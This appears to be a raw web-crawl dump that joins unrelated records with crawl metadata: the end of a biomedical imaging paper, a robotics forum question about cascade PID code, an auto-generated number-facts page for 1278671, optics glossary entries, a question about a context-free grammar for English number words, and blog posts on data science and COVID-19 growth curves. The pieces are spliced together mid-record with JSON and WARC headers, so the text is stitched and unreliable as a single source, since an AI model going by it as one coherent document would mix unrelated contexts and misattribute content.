Huang F: Computational acceleration for MR image reconstruction in partially parallel imaging. IEEE Trans Med Imaging 2011,30(5):1055–1063.\n\n40. 40.\n\nFinch D, Haltmeier M, Rakesh : Inversion of spherical means and the wave equation in even dimensions. SIAM J Appl Math 2007,68(2):392–412. 10.1137/070682137\n\n41. 41.\n\nYu Z, Noo F, Dennerlein F, Wunderlich A, Lauritsch G, Hornegger J: Simulation tools for two-dimensional experiments in x-ray computed tomography using the FORBILD head phantom. Phys Med Biol 2012,57(13):237–252. 10.1088/0031-9155/57/13/N237\n\n## Acknowledgment\n\nThis work was supported by the National Natural Science Foundation of China (No. 61271071 and No. 11228411), the National Key Technology R&D Program of China (No. 2012BAI13B02) and Specialized Research Fund for the Doctoral Program of Higher Education of China (No. 20110071110017).\n\n## Author information\n\nCorrespondence to Yuanyuan Wang.\n\n### Competing interests\n\nThe authors declared that they have no competing interests.\n\n### Authors’ contributions\n\nStudy concept and design (CZ); drafting of the manuscript (CZ); critical revision of the manuscript for important intellectual content (CZ, YZ and YW); obtained funding (YW); administrative, technical, and material support (CZ and YZ); study supervision (YW). All authors read and approved the final manuscript.\n\n## Rights and permissions\n\nReprints and Permissions", null, "" ]
[ null, "https://biomedical-engineering-online.biomedcentral.com/track/article/10.1186/1475-925X-13-117", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8878361,"math_prob":0.9744757,"size":58636,"snap":"2019-26-2019-30","text_gpt3_token_len":13232,"char_repetition_ratio":0.20429116,"word_repetition_ratio":0.07075673,"special_character_ratio":0.22811924,"punctuation_ratio":0.11207591,"nsfw_num_words":1,"has_unicode_error":false,"math_prob_llama3":0.98255473,"pos_list":[0,1,2],"im_url_duplicate_count":[null,5,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-07-20T20:19:10Z\",\"WARC-Record-ID\":\"<urn:uuid:7e4dd5f5-46fc-453f-9156-bedffa0e5311>\",\"Content-Length\":\"451073\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:88692f27-4133-4c0f-927c-aac3ee64eb39>\",\"WARC-Concurrent-To\":\"<urn:uuid:06eb824c-cb6c-4173-a4dd-a29aba0c2521>\",\"WARC-IP-Address\":\"151.101.200.95\",\"WARC-Target-URI\":\"https://biomedical-engineering-online.biomedcentral.com/articles/10.1186/1475-925X-13-117\",\"WARC-Payload-Digest\":\"sha1:WYJG7JYCQCDSSLGHV3VAOASLZEYZPLFG\",\"WARC-Block-Digest\":\"sha1:JMUME5I44EM2PNMWTTCLELM6RASQAFAI\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-30/CC-MAIN-2019-30_segments_1563195526670.1_warc_CC-MAIN-20190720194009-20190720220009-00141.warc.gz\"}"}
http://forums.jjrobots.com/showthread.php?tid=1133&pid=2274
[ "• 0 Votes - 0 Average\n• 1\n• 2\n• 3\n• 4\n• 5\n11-29-2016, 10:15 AM\nPost: #1\n Jim BK", null, "Junior Member", null, "", null, "Posts: 2 Joined: Nov 2016 Reputation: 0\nHi everyone,\nI have a project of balancing robot. I've read code of B-RObot. But I can't understand Cascade PID.\n1. What's the unit of SPEED in this code.\nPHP Code:\n`actual_robot_speed_Old = actual_robot_speed;    actual_robot_speed = (speed_M1 + speed_M2) / 2; // Positive: forward    int16_t angular_velocity = (angle_adjusted - angle_adjusted_Old) * 90.0; // 90 is an empirical extracted factor to adjust for real units    int16_t estimated_speed = -actual_robot_speed_Old - angular_velocity;     // We use robot_speed(t-1) or (t-2) to compensate the delay    estimated_speed_filtered = estimated_speed_filtered * 0.95 + (float)estimated_speed * 0.05;  // low pass filter on estimated speed `\n2. The OUTPUT of SPEED CONTROLLER is the SET POINT of STABLITY CONTROLLER. But, the process variable of STABILITY is the tilt angle, and calculated by degree. So, Do Setpoint and process variable have the same unit?" ]
[ null, "http://forums.jjrobots.com/images/buddy_offline.gif", null, "http://forums.jjrobots.com/images/star.gif", null, "http://forums.jjrobots.com/images/star.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.82510585,"math_prob":0.6877488,"size":420,"snap":"2020-45-2020-50","text_gpt3_token_len":118,"char_repetition_ratio":0.11298077,"word_repetition_ratio":0.0,"special_character_ratio":0.3,"punctuation_ratio":0.16666667,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97962433,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-20T14:08:42Z\",\"WARC-Record-ID\":\"<urn:uuid:24de8230-dfe5-45d7-bd32-1805cf32b464>\",\"Content-Length\":\"22482\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:8d01e65d-6bae-40ae-9902-abdbcbbd651d>\",\"WARC-Concurrent-To\":\"<urn:uuid:714c20c5-1beb-4a42-9e0b-d44c67cae8c8>\",\"WARC-IP-Address\":\"35.214.124.63\",\"WARC-Target-URI\":\"http://forums.jjrobots.com/showthread.php?tid=1133&pid=2274\",\"WARC-Payload-Digest\":\"sha1:SQW37XLKZJ3UFFIJ6DTXUCENEMGB5467\",\"WARC-Block-Digest\":\"sha1:53IZWRTTN5FGP6DNNQCFXDKNDAOSCFU2\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-45/CC-MAIN-2020-45_segments_1603107872746.20_warc_CC-MAIN-20201020134010-20201020164010-00705.warc.gz\"}"}
https://metanumbers.com/1278671
[ "# 1278671 (number)\n\n1,278,671 (one million two hundred seventy-eight thousand six hundred seventy-one) is an odd seven-digits prime number following 1278670 and preceding 1278672. In scientific notation, it is written as 1.278671 × 106. The sum of its digits is 32. It has a total of 1 prime factor and 2 positive divisors. There are 1,278,670 positive integers (up to 1278671) that are relatively prime to 1278671.\n\n## Basic properties\n\n• Is Prime? Yes\n• Number parity Odd\n• Number length 7\n• Sum of Digits 32\n• Digital Root 5\n\n## Name\n\nShort name 1 million 278 thousand 671 one million two hundred seventy-eight thousand six hundred seventy-one\n\n## Notation\n\nScientific notation 1.278671 × 106 1.278671 × 106\n\n## Prime Factorization of 1278671\n\nPrime Factorization 1278671\n\nPrime number\nDistinct Factors Total Factors Radical ω(n) 1 Total number of distinct prime factors Ω(n) 1 Total number of prime factors rad(n) 1.27867e+06 Product of the distinct prime numbers λ(n) -1 Returns the parity of Ω(n), such that λ(n) = (-1)Ω(n) μ(n) -1 Returns: 1, if n has an even number of prime factors (and is square free) −1, if n has an odd number of prime factors (and is square free) 0, if n has a squared prime factor Λ(n) 14.0613 Returns log(p) if n is a power pk of any prime p (for any k >= 1), else returns 0\n\nThe prime factorization of 1,278,671 is 1278671. Since it has a total of 1 prime factor, 1,278,671 is a prime number.\n\n## Divisors of 1278671\n\n2 divisors\n\n Even divisors 0 2 1 1\nTotal Divisors Sum of Divisors Aliquot Sum τ(n) 2 Total number of the positive divisors of n σ(n) 1.27867e+06 Sum of all the positive divisors of n s(n) 1 Sum of the proper positive divisors of n A(n) 639336 Returns the sum of divisors (σ(n)) divided by the total number of divisors (τ(n)) G(n) 1130.78 Returns the nth root of the product of n divisors H(n) 2 Returns the total number of divisors (τ(n)) divided by the sum of the reciprocal of each divisors\n\nThe number 1,278,671 can be divided by 2 positive divisors (out of which 0 are even, and 2 are odd). The sum of these divisors (counting 1,278,671) is 1,278,672, the average is 639,336.\n\n## Other Arithmetic Functions (n = 1278671)\n\n1 φ(n) n\nEuler Totient Carmichael Lambda Prime Pi φ(n) 1278670 Total number of positive integers not greater than n that are coprime to n λ(n) 1278670 Smallest positive number such that aλ(n) ≡ 1 (mod n) for all a coprime to n π(n) ≈ 98281 Total number of primes less than or equal to n r2(n) 0 The number of ways n can be represented as the sum of 2 squares\n\nThere are 1,278,670 positive integers (less than 1,278,671) that are coprime with 1,278,671. And there are approximately 98,281 prime numbers less than or equal to 1,278,671.\n\n## Divisibility of 1278671\n\n m n mod m 2 3 4 5 6 7 8 9 1 2 3 1 5 2 7 5\n\n1,278,671 is not divisible by any number less than or equal to 9.\n\n## Classification of 1278671\n\n• Arithmetic\n• Prime\n• Deficient\n\n### Expressible via specific sums\n\n• Polite\n• Non-hypotenuse\n\n• Prime Power\n• Square Free\n\n## Base conversion (1278671)\n\nBase System Value\n2 Binary 100111000001011001111\n3 Ternary 2101222000012\n4 Quaternary 10320023033\n5 Quinary 311404141\n6 Senary 43223435\n8 Octal 4701317\n10 Decimal 1278671\n12 Duodecimal 517b7b\n20 Vigesimal 7jgdb\n36 Base36 remn\n\n## Basic calculations (n = 1278671)\n\n### Multiplication\n\nn×y\n n×2 2557342 3836013 5114684 6393355\n\n### Division\n\nn÷y\n n÷2 639336 426224 319668 255734\n\n### Exponentiation\n\nny\n n2 1634999526241 2090626479218105711 2673223450808294447590081 3418173303068492669594456462351\n\n### Nth Root\n\ny√n\n 2√n 1130.78 108.539 33.6271 16.6476\n\n## 1278671 as geometric shapes\n\n### Circle\n\n Diameter 2.55734e+06 8.03413e+06 5.1365e+12\n\n### Sphere\n\n Volume 8.7572e+18 2.0546e+13 8.03413e+06\n\n### Square\n\nLength = n\n Perimeter 5.11468e+06 1.635e+12 1.80831e+06\n\n### Cube\n\nLength = n\n Surface area 9.81e+12 2.09063e+18 2.21472e+06\n\n### Equilateral Triangle\n\nLength = n\n Perimeter 3.83601e+06 7.07976e+11 1.10736e+06\n\n### Triangular Pyramid\n\nLength = n\n Surface area 2.8319e+12 2.46383e+17 1.04403e+06\n\n## Cryptographic Hash Functions\n\nmd5 12dc02baf878f42c0916c85c7dcc7b8b ce24cbc9acefeb5c1c113ff019f02c3bac61e401 dc1f02bf3dbd029acd3ae132745b65c9d0c02d7500bfe636f6db0af823471e89 201bffcb82f3b5f6d6c62a0fe02bcd70161242ffa7c7b35d6bce100509e7f75ee60a84655ee14e6ce8d8b2fa378a75bc923ca67febebff9b461f395734bc55aa cd27f1e64d6783361d72662fb3747931c7e1e7c5" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.63344556,"math_prob":0.97918856,"size":4787,"snap":"2021-43-2021-49","text_gpt3_token_len":1707,"char_repetition_ratio":0.1277441,"word_repetition_ratio":0.037900876,"special_character_ratio":0.46041363,"punctuation_ratio":0.086797066,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99475044,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-17T22:00:17Z\",\"WARC-Record-ID\":\"<urn:uuid:9a9d6644-1556-40f7-bba5-34407652b8ab>\",\"Content-Length\":\"39850\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:cb85bb93-a68f-40d2-a572-6445e313db8e>\",\"WARC-Concurrent-To\":\"<urn:uuid:ad27988d-34d9-4960-a75e-711dc1127a2b>\",\"WARC-IP-Address\":\"46.105.53.190\",\"WARC-Target-URI\":\"https://metanumbers.com/1278671\",\"WARC-Payload-Digest\":\"sha1:3OT2DBCYB3JJPC7WWKNUMD25YEMVEUGD\",\"WARC-Block-Digest\":\"sha1:UZ4D7XVPILEUTUTRX47O4NLPBEVDQPUY\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323585183.47_warc_CC-MAIN-20211017210244-20211018000244-00535.warc.gz\"}"}
https://www.optowiki.info/glossary/filter:fo/
[ "# focal length\n\nThe focal length is the distance from the Image side principal plane to the image of objects at infinity.\n\nFor single lenses in air that is equal to the distance from the first focal point to the first principal point.\n(in each case measured from the left to the right)\n\nNote that this is a positive value for converging lenses and a negative value for the divergent lenses.\n\nThe larger the focal length, the smaller the aperture angle of the lens and the smaller the object section that is displayed full-frame on the sensor.\nThe lens captures less of the object. Extremea are telephoto lenses and finally telescopes.\n\nThe smaller the focal length, the larger the aperture angle of the lens and the larger the object section which is displayed full-frame on the sensor.\nThe lens captures more of the object. Extreme forms are fisheye lenses.\n\nLenses are typically listed, sorted by focal length. As an approximation, lenses with larger focal length see a smaller portion of the object (in more detail).\n\nThere are exceptions! (See: pseudo-knowledge: viewing angle and focal length are equivalent)\n\nThe following calculator determines focal length from angles.\nHowever, Viewing angles change with the working distance! Also, a Pinhole lens model is assumed. Thus for wide angles a too small focal length is returned .. (as all focal length calculators on the internet do 😉 )\n\nFor the next calculator it is very important to correct the distortions before doing the calculation:\n\n# focal point\n\nEach (rotation symmetric) lens has two focal points on it’s optical axis.\nThey’re located where images of infinite distanct objects are generated.\nThe focal points belong to the Gauss-points.\n\nWhen a ray of light is sent parallel to the optical axis into a lens or lens system, then the ray or it’s prolongation intersects the optical axis after exiting the last lens.\n\nThis intersection with the optical axis is called focal point.\n\nThe name is derived from “burning glasses” (imagine a magnifying glass) with which the (nearly parallel) sun beams are bundled to one point.\nAt this point it gets so hot that wood or paper placed at this spot starts to burn." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.90026134,"math_prob":0.9742297,"size":1407,"snap":"2022-27-2022-33","text_gpt3_token_len":281,"char_repetition_ratio":0.15609409,"word_repetition_ratio":0.07692308,"special_character_ratio":0.19402985,"punctuation_ratio":0.09505703,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97806644,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-08-19T05:52:24Z\",\"WARC-Record-ID\":\"<urn:uuid:28fee8ec-ca07-4dfa-8c84-bffa578820bd>\",\"Content-Length\":\"89868\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:a1b4f3c1-2660-4b14-960b-0686f82ab70c>\",\"WARC-Concurrent-To\":\"<urn:uuid:acd29781-4eeb-480b-9f4e-1056133c6f7f>\",\"WARC-IP-Address\":\"87.230.107.220\",\"WARC-Target-URI\":\"https://www.optowiki.info/glossary/filter:fo/\",\"WARC-Payload-Digest\":\"sha1:TMZHKT25QMKGTF4M2RTRUZTLECA3DBDQ\",\"WARC-Block-Digest\":\"sha1:6NU2S5KNRSRAAGAVBNPZ3J236GV3STXJ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-33/CC-MAIN-2022-33_segments_1659882573623.4_warc_CC-MAIN-20220819035957-20220819065957-00335.warc.gz\"}"}
https://cs.stackexchange.com/questions/135537/a-formal-grammar-defining-english-counting-numbers
[ "# A Formal Grammar: defining English counting numbers?\n\nI would like to define a grammar that produces and recognizes the counting numbers of the English language. I created the production rules below based on the assumption this is context-free, but I am not entirely sure thats the case. Is this a context-free or context-sensitive grammar? If context-free, do my production rules look ok?\n\nFor example:\n\n\"one hundred twenty two\" $$\\in \\Sigma^*$$ which has the semantic meaning $$b^2+2b^1+2b^0$$\n\n\"one thousand two hundred thirty three\" $$\\in \\Sigma^*$$, $$b^3+2b^2+3b^1+3b^0$$\n\nI understand context-free production rules are $$N \\rightarrow \\alpha$$ and context-sensitive $$\\alpha N \\beta \\rightarrow \\alpha \\gamma \\beta$$, where $$N$$ is a non-terminal and $$\\alpha,\\gamma$$ are terminals or non-terminals.\n\nI considered CFG production rules in Backus Naur Form as follows, but am unsure if it's correct:\n\n<S> := \"zero\" | <b3> | <thou> | <mill> | <bill> | \"\"\n<num99> := <ones> | <teens> | <tens> | <tens> <ones>\n<num99opt> := <num99> | \"\"\n<b3> := <ones> \"hundred\" <num99opt> | <num99>\n<b3op> := <b3> | \"\"\n<thou> := <b3> \"thousand\" <b3op>\n<thouop> := <thou> | <b3op>\n<mill> := <b3> \"million\" <thouop>\n<millop>:= <mill> | <thouop>\n<bill> := <b3> \"billion\" <millop>\n<tens> := \"twenty\" | \"thirty\" | ... | \"ninety\"\n<teens> := \"ten\" | \"eleven\" | ... | \"nineteen\"\n<ones> := \"one\" | \"two\" | ... | \"nine\"\n\n• \"I understand context-free production rules are $N→α$ and context-sensitive $αNβ→αγβ$.\" Ok, in that case why do you have any doubt about whether your grammar is context-free? Or do you mean that you are not sure that the language is context-free, which is a different question (but the answer is that it is). – rici Feb 15 at 17:08\n• I note the supplied grammar is CFG, however am unsure it is correct to generate the grammar described. Given your comment, it appears this is a CFG. – Nick Feb 17 at 20:57\n• @rici I updated the grammar, appreciate any feedback – Nick Feb 17 at 22:02\n• That grammar looks fine (and obviously could be extended for larger numbers). Note that there are only a finite number of derivable phrases. (It's a large number, but it's still finite.) All finite languages are regular (and therefore context free, because regular languages are a strict subset of context free languages). – rici Feb 17 at 23:12\n• Thanks. I suspect the grammar produces finite derivations because of the largest prefix, i.e. \"million\", \"billion\", \"trillion\". I'm confused why it is regular. I saw that regular grammars are defined such that the production rules are in the form $A \\rightarrow aB$ or $A \\rightarrow a$, where $A,B \\in N$ and $a \\in \\Sigma^*$ and where only a single non-terminal is allowed on the RHS. The above grammar has multiple non-terminals on the RHS, so differs from the definition of a regular grammar. Am I missing something? – Nick Feb 18 at 0:36" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8009924,"math_prob":0.9287464,"size":1321,"snap":"2021-04-2021-17","text_gpt3_token_len":439,"char_repetition_ratio":0.12528473,"word_repetition_ratio":0.0,"special_character_ratio":0.3648751,"punctuation_ratio":0.15151516,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9978362,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-04-17T13:03:37Z\",\"WARC-Record-ID\":\"<urn:uuid:6ce117cd-4763-472c-b240-5d6fc4dcf330>\",\"Content-Length\":\"163555\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:d4933091-2f4f-4edb-9947-e4754e35c37f>\",\"WARC-Concurrent-To\":\"<urn:uuid:241eb0dc-03b2-468c-998b-0e2599ebecf3>\",\"WARC-IP-Address\":\"151.101.1.69\",\"WARC-Target-URI\":\"https://cs.stackexchange.com/questions/135537/a-formal-grammar-defining-english-counting-numbers\",\"WARC-Payload-Digest\":\"sha1:IUQ4IZZSIE7ZLKKER6V3I2L5A72FZBRS\",\"WARC-Block-Digest\":\"sha1:3QAUPQJNO7IHXFCQLO57IPNSOTNDNQP4\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-17/CC-MAIN-2021-17_segments_1618038119532.50_warc_CC-MAIN-20210417102129-20210417132129-00338.warc.gz\"}"}
https://de.mathworks.com/matlabcentral/cody/players/6503672-doug-hull/badges
[ "Cody", null, "# Doug Hull\n\nRank\nScore\n1 – 60 of 64\n\n#### Commenter+10\n\nEarned on 17 Feb 2012 for commenting on Problem 333. Poker Series 02: isQuads.\n\n#### Puzzler+50\n\nEarned on 16 Feb 2012 for creating 10 problems.\n\n#### Quiz Master+20\n\nEarned on 29 Mar 2019 for having 50 or more solvers for Problem 230. Project Euler: Problem 1, Multiples of 3 and 5.\n\n#### Famous+20\n\nEarned on 29 Mar 2013 for receiving 25 total likes for the created problems.\n\n#### Likeable+20\n\nEarned on 8 Oct 2019 for Problem 230. Project Euler: Problem 1, Multiples of 3 and 5 for having 10 or more likes.\n\n#### Promoter+10\n\nLike a problem or solution.\n\n#### CUP Challenge Master+50\n\nSolve all the problems in CUP Challenge problem group.\n\n#### Community Group Solver+50\n\nSolve a community group\n\n#### Introduction to MATLAB Master+50\n\nSolve all the problems in Introduction to MATLAB problem group.\n\n#### Speed Demon+50\n\nSolve a problem first.\n\nSolve a problem with a best solution.\n\n#### Curator+50\n\n25 solvers for the group curated by the player\n\n#### Cody Challenge Master+50\n\nSolve all the problems in Cody Challenge problem group.\n\n#### ASEE Challenge Master+50\n\nSolve all the problems in ASEE Challenge problem group.\n\n#### Tiles Challenge Master+50\n\nSolve all the problems in Tiles Challenge problem group.\n\n#### Scholar+50\n\nSolve 500 problems.\n\n#### Cody5:Easy Master+50\n\nSolve all the problems in Cody5:Easy problem group.\n\n#### Project Euler I Master+50\n\nSolve all the problems in Project Euler I problem group.\n\n#### Indexing I Master+50\n\nSolve all the problems in Indexing I problem group.\n\n#### Draw Letters Master+50\n\nSolve all the problems in Draw Letters problem group.\n\n#### Cody Problems in Japanese Master+50\n\nSolve all the problems in Cody Problems in Japanese problem group.\n\n#### Indexing II Master+50\n\nSolve all the problems in Indexing II problem group.\n\n#### Matrix Manipulation I Master+50\n\nSolve all the problems in Matrix Manipulation I problem group.\n\n#### Magic Numbers Master+50\n\nSolve all the problems in Magic Numbers problem group.\n\n#### Sequences & Series I Master+50\n\nSolve all the problems in Sequences & Series I problem group.\n\n#### Computational Geometry I Master+50\n\nSolve all the problems in Computation Geometry I problem group.\n\n#### Matrix Patterns I Master+50\n\nSolve all the problems in Matrix Patterns problem group.\n\n#### Strings I Master+50\n\nSolve all the problems in Strings I problem group.\n\n#### Divisible by x Master+50\n\nSolve all the problems in Divisible by x problem group.\n\n#### R2016b Feature Challenge Master+50\n\nSolve all the problems in R2016b Feature Challenge problem group.\n\n#### Number Manipulation I Master+50\n\nSolve all the problems in Number Manipulation I problem group.\n\n#### Matrix Manipulation II Master+50\n\nSolve all the problems in Matrix Manipulation II problem group.\n\n#### Matrix Patterns II Master+50\n\nSolve all the problems in Matrix Patterns II problem group.\n\n#### Cody5:Hard Master+50\n\nSolve all the problems in Cody5:Hard problem group.\n\n#### Indexing III Master+50\n\nSolve all the problems in Indexing III problem group.\n\n#### Sequences & Series II Master+50\n\nSolve all the problems in Sequences & Series II problem group.\n\n#### Functions I Master+50\n\nSolve all the problems in Functions I problem group.\n\n#### Magic Numbers II Master+50\n\nSolve all the problems in Magic Numbers II problem group.\n\n#### Matrix Patterns III Master+50\n\nSolve all the problems in Matrix Patterns III problem group.\n\n#### Celebrity+20\n\nMust receive 50 total likes for the solutions you submitted.\n\n#### Indexing V Master+50\n\nSolve all the problems in Indexing V problem group.\n\n#### Card Games Master+50\n\nSolve all the problems in Card Games problem group.\n\n#### Strings II Master+50\n\nSolve all the problems in Strings II problem group.\n\n#### Sequences & Series III Master+50\n\nSolve all the problems in Sequences & Series III problem group.\n\n#### Matrix Manipulation III Master+50\n\nSolve all the problems in Matrix Manipulation III problem group.\n\n#### Number Manipulation II Master+50\n\nSolve all the problems in Number Manipulation II problem group.\n\n#### Computational Geometry II Master+50\n\nSolve all the problems in Computational Geometry II problem group.\n\n#### Indexing IV Master+50\n\nSolve all the problems in Indexing IV problem group.\n\n#### Renowned+20\n\nMust receive 10 likes for a solution you submitted.\n\n#### Strings III Master+50\n\nSolve all the problems in Strings III problem group.\n\n#### Computational Geometry IV Master+50\n\nSolve all the problems in Computational Geometry IV problem group.\n\n#### Word Puzzles Master+50\n\nSolve all the problems in Word Puzzles problem group.\n\n#### Computational Geometry III Master+50\n\nSolve all the problems in Computational Geometry III problem group.\n\n#### Combinatorics I Master+50\n\nSolve all the problems in Combinatorics - I problem group.\n\n#### Modeling & Simulation Challenge Master+50\n\nSolve all the problems in Modeling and Simulation Challenge problem group.\n\n#### Computer Games I Master+50\n\nSolve all the problems in Computer Games I problem group.\n\n#### Board Games I Master+50\n\nSolve all the problems in Board Games I problem group.\n\n#### Logic Master+50\n\nSolve all the problems in Logic problem group." ]
[ null, "https://de.mathworks.com/matlabcentral/profiles/6503672.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8256835,"math_prob":0.61970943,"size":838,"snap":"2019-43-2019-47","text_gpt3_token_len":207,"char_repetition_ratio":0.21582733,"word_repetition_ratio":0.25714287,"special_character_ratio":0.25894988,"punctuation_ratio":0.15789473,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.958301,"pos_list":[0,1,2],"im_url_duplicate_count":[null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-11-14T15:15:34Z\",\"WARC-Record-ID\":\"<urn:uuid:35547b5d-8f7b-48c1-86bb-f4f7150bd4e2>\",\"Content-Length\":\"120648\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b38f4be4-8a24-4e15-91a0-e0272e0959a4>\",\"WARC-Concurrent-To\":\"<urn:uuid:21a28f65-c7b7-4a0c-a1d5-0dae1d07242d>\",\"WARC-IP-Address\":\"104.110.193.39\",\"WARC-Target-URI\":\"https://de.mathworks.com/matlabcentral/cody/players/6503672-doug-hull/badges\",\"WARC-Payload-Digest\":\"sha1:WEWCPPSAKDYV5IH75QPFNZDC7K3U3RNB\",\"WARC-Block-Digest\":\"sha1:OR4OY5COMV3SU6TTNEEL36UOCUTGN3HT\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-47/CC-MAIN-2019-47_segments_1573496668525.62_warc_CC-MAIN-20191114131434-20191114155434-00037.warc.gz\"}"}
https://jonathanstolle.wordpress.com/
[ "# A PhD Thesis\n\nSomeone close to me finished their thesis in a separate discipline in the last 1.5 years. It’s well-lauded (news came out recently about it), so I thought I would share. It is in a discipline, with which I am not that familiar, so I cannot comment that much on the content, though I had some exposure to related fields nearly 15 years ago, so it is not totally unrelated either, so it is interesting. I have not finished reading through, but I am interesting in the stochastic approach portrayed for debris transport.\n\n# Another quick chapter\n\nWork is still busy, but I still come across a number of articles, which could be of interest to the audience of this blog:\nhttps://phys.org/news/2020-03-mathematicians-theory-real-world-randomness.html\n\nAnd for those interested in studying datascience, you could have a day and a half free access to datacamp:\nhttps://www.datacamp.com/freeweek\n\n# A few data science learning links\n\nWell, it’s been busy this past month and I haven’t had time for derivations, but I have nonetheless come across some interesting articles concerning my interests relating to this blog (in this case, just data science). I hope it’s helpful:\n\nhttps://towardsdatascience.com/nvidia-gave-me-a-15k-data-science-workstation-heres-what-i-did-with-it-70cfb069fc35\nhttps://towardsdatascience.com/4-free-maths-courses-to-do-in-quarantine-and-level-up-your-data-science-skills-f815daca56f7\nhttps://towardsdatascience.com/mathematics-for-data-science-e53939ee8306\n\n# COVID-19 and What’s With Reporting about Exponential Increases in Cases?\n\n“Flattening the curve” has become a popular expression nowadays, referring to slowing the spread of the new Corona virus (for a reference, https://www.livescience.com/coronavirus-flatten-the-curve.html).  In contrast to a “flattened-curve” (South Korea), there are plots of exponential growth (most other countries and South Korea in the early stages of the disease):\n\nhttps://www.vox.com/policy-and-politics/2020/3/13/21178289/confirmed-coronavirus-cases-us-countries-italy-iran-singapore-hong-kong\n\nFirst, off, why do many plots start at the day when 100 cases were reached?  Before there are a lot of cases, statistically, the spread of the disease can be noisy; that is, say quite a few of those infected early on are socially distant, then the disease might only be transmitted over there few interactions  (there’s the separate issue of testing for the disease, but that can be potentially gotten into at a later point).  Also, the slow incubation period/ slow time to show symptoms could cause noisiness in the plot because in the early stages, people weren’t tested until there was a reason to.  Anyhow, many of the plots in the lower right-hand corner (you are look at each country individually) confirm that the early trend is not as clearly linear as after a many cases have shown up: https://gisanddata.maps.arcgis.com/apps/opsdashboard/index.html#/bda7594740fd40299423467b48e9ecf6 (which I got from here: http://www.cidrap.umn.edu/covid-19/maps-visuals). Also note that the slow incubation period is the reason why social distancing efforts take weeks to be noticed.\n\nTo explain the exponential beginnings, we can look at a number of models used to describe the spread of the disease:\n\nhttps://en.wikipedia.org/wiki/Compartmental_models_in_epidemiology\n\n(Or for the commonly referred to SEIR model: https://sites.me.ucsb.edu/~moehlis/APC514/tutorials/tutorial_seasonal/node4.html )\n\nLet’s look at the early stages (and also assume that once infected, you cannot be infected again, though in the early stages, we can ignore this relation).  Taking", null, "$I$ to be the number of infected and", null, "$H$ to be the number of healthy individuals, it is assumed  that the rate of infection is proportional to both these values", null, "$\\frac{d I}{d t} = k H I = k I (N - I)$\n\nwhere the total population is either healthy or infected", null, "$N = H + I$ .   Note that even if it is not true that every individual has the same number of contacts, statistically-speaking, the relation often holds.  The solution to the differential equation is the sigmoidal function(for reference: https://www.reddit.com/r/dataisbeautiful/comments/fohr58/oc_the_technical_problems_of_fitting_a_logistic/)", null, "$I(t) = \\frac{kN}{k+\\exp(kNt-t_0)}= N \\frac{\\exp(kNt-t_0)}{\\exp(kNt-t_0)+1/k}$\n\nFor small values (", null, "$t << t_0 + \\ln (1/k)/kN$ or", null, "$I(t=0) = N \\frac{\\exp(-t_0)}{\\exp(-t_0)+1/k} << N$), this curve is exponential:", null, "$I(t) \\approx k N \\exp(kNt-t_0)$\n\nAnother way of seeing this is", null, "$\\frac{d I}{d t} \\approx k I N$\n\nwhen", null, "$I << N$ and the solution of that equation is a exponential", null, "$I(t) \\approx k N \\exp(kNt-t_0)$\n\nthe same as the above!\n\nAs an exercise, you can plot the approximate and exact solutions and see how they differ (when they are the same and when they differ significantly).\n\n# Another podcast — Athlete chooses math :p\n\nI haven’t watched it yet, but I heard that John Urschel was a talented mathematician when he was playing in the NFL. Enjoy:\nhttps://www.quantamagazine.org/john-urschel-from-nfl-player-to-mathematician-20200225/\n\nIf you enjoyed this, depending on your inclinations (especially if they are to the more applied side), you might wish to listen to DataCamp, e.g.:\n\nDataframed Podcast on “Data Nerdism,” Fun, and General Thoughts about Education\n\n# A cute mathematical problem, the catenary\n\nOriginally, I saw the problem in the link below, elsewhere (though I do not recall where).  The problem is solved in the video, but you can also look at my notes.\n\nCan You Solve Amazon’s Hanging Cable Interview Question?\n\nIn the Wikipedia article on the Catenary, look at the Mathematical Description and Analysis sections for relevant details which I will describe 